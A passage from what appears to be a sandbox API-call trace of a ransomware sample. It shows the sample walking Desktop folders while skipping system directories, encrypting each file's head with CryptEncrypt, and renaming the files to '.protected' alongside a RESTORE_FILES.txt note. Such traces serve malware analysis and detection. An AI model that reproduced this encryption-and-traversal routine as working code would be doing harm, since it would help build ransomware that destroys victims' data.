lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.173] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0091.173] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.173] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0091.173] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0091.174] CloseHandle (hObject=0xd8) returned 1 [0091.174] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\5-oyH08kP_LNgi9EejZa.swf.protected") returned 105 [0091.174] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\5-oyH08kP_LNgi9EejZa.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\5-oyh08kp_lngi9eejza.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\5-oyH08kP_LNgi9EejZa.swf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\5-oyh08kp_lngi9eejza.swf.protected")) returned 1 [0091.175] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0091.175] lstrcmpiW (lpString1="DsoHgMd_94Dqe", lpString2="Windows") returned -1 [0091.175] lstrcmpiW (lpString1="DsoHgMd_94Dqe", lpString2="Program Files") returned -1 [0091.175] lstrcmpiW (lpString1="DsoHgMd_94Dqe", lpString2="Program Files (x86)") returned -1 [0091.175] lstrcmpiW (lpString1="DsoHgMd_94Dqe", lpString2="$Recycle.bin") returned 1 [0091.175] lstrcmpiW (lpString1="DsoHgMd_94Dqe", lpString2="System Volume Information") returned -1 [0091.175] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe") returned 84 [0091.175] lstrcmpW (lpString1="DsoHgMd_94Dqe", lpString2=".") returned 1 [0091.175] lstrcmpW (lpString1="DsoHgMd_94Dqe", lpString2="..") returned 1 [0091.175] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\*") returned 86 [0091.175] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0091.175] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.175] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.175] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.175] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.175] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.175] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\.") returned 86 [0091.175] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.175] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.175] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.175] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.175] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.175] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.175] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.175] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\..") returned 87 [0091.175] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.175] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.176] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.176] lstrcmpiW (lpString1="4NkOLGHL.m4a", lpString2="Windows") returned -1 [0091.176] lstrcmpiW (lpString1="4NkOLGHL.m4a", lpString2="Program Files") returned -1 [0091.176] lstrcmpiW (lpString1="4NkOLGHL.m4a", lpString2="Program Files (x86)") returned -1 [0091.176] lstrcmpiW (lpString1="4NkOLGHL.m4a", lpString2="$Recycle.bin") returned 1 [0091.176] lstrcmpiW (lpString1="4NkOLGHL.m4a", lpString2="System Volume Information") returned -1 [0091.176] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\4NkOLGHL.m4a") returned 97 [0091.176] StrStrIW (lpFirst="4NkOLGHL.m4a", lpSrch=".protected") returned 0x0 [0091.176] lstrcmpW (lpString1="4NkOLGHL.m4a", lpString2="RESTORE_FILES.txt") returned -1 [0091.176] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0091.176] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0091.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\4NkOLGHL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\4nkolghl.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\4NkOLGHL.m4a") returned 97 [0091.176] StrStrW (lpFirst="4NkOLGHL.m4a", lpSrch=".txt") returned 0x0 [0091.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\4NkOLGHL.m4a") returned 97 [0091.176] StrStrW (lpFirst="4NkOLGHL.m4a", lpSrch=".rar") returned 0x0 [0091.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\4NkOLGHL.m4a") returned 97 [0091.176] StrStrW (lpFirst="4NkOLGHL.m4a", lpSrch=".zip") returned 0x0 [0091.176] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.177] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.177] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.177] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.177] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0091.177] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0091.177] CloseHandle (hObject=0x14c) returned 1 [0091.177] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\4NkOLGHL.m4a.protected") returned 107 [0091.177] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\4NkOLGHL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\4nkolghl.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\4NkOLGHL.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\4nkolghl.m4a.protected")) returned 1 [0091.178] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.178] lstrcmpiW (lpString1="dbGaHWrA 0a.wav", lpString2="Windows") returned -1 [0091.178] lstrcmpiW (lpString1="dbGaHWrA 0a.wav", lpString2="Program Files") returned -1 [0091.178] lstrcmpiW (lpString1="dbGaHWrA 0a.wav", lpString2="Program Files (x86)") returned -1 [0091.178] lstrcmpiW (lpString1="dbGaHWrA 0a.wav", lpString2="$Recycle.bin") returned 1 [0091.178] lstrcmpiW (lpString1="dbGaHWrA 0a.wav", lpString2="System Volume Information") returned -1 [0091.178] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\dbGaHWrA 0a.wav") returned 100 [0091.178] StrStrIW (lpFirst="dbGaHWrA 0a.wav", lpSrch=".protected") returned 0x0 [0091.178] lstrcmpW (lpString1="dbGaHWrA 0a.wav", lpString2="RESTORE_FILES.txt") returned -1 [0091.178] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0091.178] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0091.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\dbGaHWrA 0a.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\dbgahwra 0a.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.178] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\dbGaHWrA 0a.wav") returned 100 [0091.178] StrStrW (lpFirst="dbGaHWrA 0a.wav", lpSrch=".txt") returned 0x0 [0091.178] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\dbGaHWrA 0a.wav") returned 100 [0091.178] StrStrW (lpFirst="dbGaHWrA 0a.wav", lpSrch=".rar") returned 0x0 [0091.178] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\dbGaHWrA 0a.wav") returned 100 [0091.179] StrStrW (lpFirst="dbGaHWrA 0a.wav", lpSrch=".zip") returned 0x0 [0091.179] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.179] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.179] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.179] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.179] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0091.179] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0091.179] CloseHandle (hObject=0x14c) returned 1 [0091.180] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\dbGaHWrA 0a.wav.protected") returned 110 [0091.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\dbGaHWrA 0a.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\dbgahwra 0a.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\dbGaHWrA 0a.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\dbgahwra 0a.wav.protected")) returned 1 [0091.180] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.180] lstrcmpiW (lpString1="G7ClT0AmJ8fD fQ.odt", lpString2="Windows") returned -1 [0091.180] lstrcmpiW (lpString1="G7ClT0AmJ8fD fQ.odt", lpString2="Program Files") returned -1 [0091.180] lstrcmpiW (lpString1="G7ClT0AmJ8fD fQ.odt", lpString2="Program Files (x86)") returned -1 [0091.180] lstrcmpiW (lpString1="G7ClT0AmJ8fD fQ.odt", lpString2="$Recycle.bin") returned 1 [0091.180] lstrcmpiW (lpString1="G7ClT0AmJ8fD fQ.odt", lpString2="System Volume Information") returned -1 [0091.180] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\G7ClT0AmJ8fD fQ.odt") returned 104 [0091.180] StrStrIW (lpFirst="G7ClT0AmJ8fD fQ.odt", lpSrch=".protected") returned 0x0 [0091.180] lstrcmpW (lpString1="G7ClT0AmJ8fD fQ.odt", lpString2="RESTORE_FILES.txt") returned -1 [0091.180] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0091.180] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0091.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\G7ClT0AmJ8fD fQ.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\g7clt0amj8fd fq.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.181] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\G7ClT0AmJ8fD fQ.odt") returned 104 [0091.181] StrStrW (lpFirst="G7ClT0AmJ8fD fQ.odt", lpSrch=".txt") returned 0x0 [0091.181] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\G7ClT0AmJ8fD fQ.odt") returned 104 [0091.181] StrStrW (lpFirst="G7ClT0AmJ8fD fQ.odt", lpSrch=".rar") returned 0x0 [0091.181] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\G7ClT0AmJ8fD fQ.odt") returned 104 [0091.181] StrStrW (lpFirst="G7ClT0AmJ8fD fQ.odt", lpSrch=".zip") returned 0x0 [0091.181] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.181] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.181] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.182] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.182] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0091.182] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0091.182] CloseHandle (hObject=0x14c) returned 1 [0091.182] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\G7ClT0AmJ8fD fQ.odt.protected") returned 114 [0091.182] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\G7ClT0AmJ8fD fQ.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\g7clt0amj8fd fq.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\G7ClT0AmJ8fD fQ.odt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\g7clt0amj8fd fq.odt.protected")) returned 1 [0091.182] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.182] lstrcmpiW (lpString1="Kfu0Y9c3Zz0gzms4S", lpString2="Windows") returned -1 [0091.182] lstrcmpiW (lpString1="Kfu0Y9c3Zz0gzms4S", lpString2="Program Files") returned -1 [0091.182] lstrcmpiW (lpString1="Kfu0Y9c3Zz0gzms4S", lpString2="Program Files (x86)") returned -1 [0091.183] lstrcmpiW (lpString1="Kfu0Y9c3Zz0gzms4S", lpString2="$Recycle.bin") returned 1 [0091.183] lstrcmpiW (lpString1="Kfu0Y9c3Zz0gzms4S", lpString2="System Volume Information") returned -1 [0091.183] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S") returned 102 [0091.183] lstrcmpW (lpString1="Kfu0Y9c3Zz0gzms4S", lpString2=".") returned 1 [0091.183] lstrcmpW (lpString1="Kfu0Y9c3Zz0gzms4S", lpString2="..") returned 1 [0091.183] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\*") returned 104 [0091.183] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0091.183] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.183] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.183] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.183] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.183] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.183] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\.") returned 104 [0091.183] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.183] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0091.183] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.183] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.183] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.183] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.183] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.183] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\..") returned 105 [0091.183] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.183] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.183] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0091.183] lstrcmpiW (lpString1="34q8LYel2GI7toSolS.mp3", lpString2="Windows") returned -1 [0091.183] lstrcmpiW (lpString1="34q8LYel2GI7toSolS.mp3", lpString2="Program Files") returned -1 [0091.183] lstrcmpiW (lpString1="34q8LYel2GI7toSolS.mp3", lpString2="Program Files (x86)") returned -1 [0091.183] lstrcmpiW (lpString1="34q8LYel2GI7toSolS.mp3", lpString2="$Recycle.bin") returned 1 [0091.183] lstrcmpiW (lpString1="34q8LYel2GI7toSolS.mp3", lpString2="System Volume Information") returned -1 [0091.183] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\34q8LYel2GI7toSolS.mp3") returned 125 [0091.183] StrStrIW (lpFirst="34q8LYel2GI7toSolS.mp3", lpSrch=".protected") returned 0x0 [0091.183] lstrcmpW (lpString1="34q8LYel2GI7toSolS.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0091.183] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0091.183] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0091.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 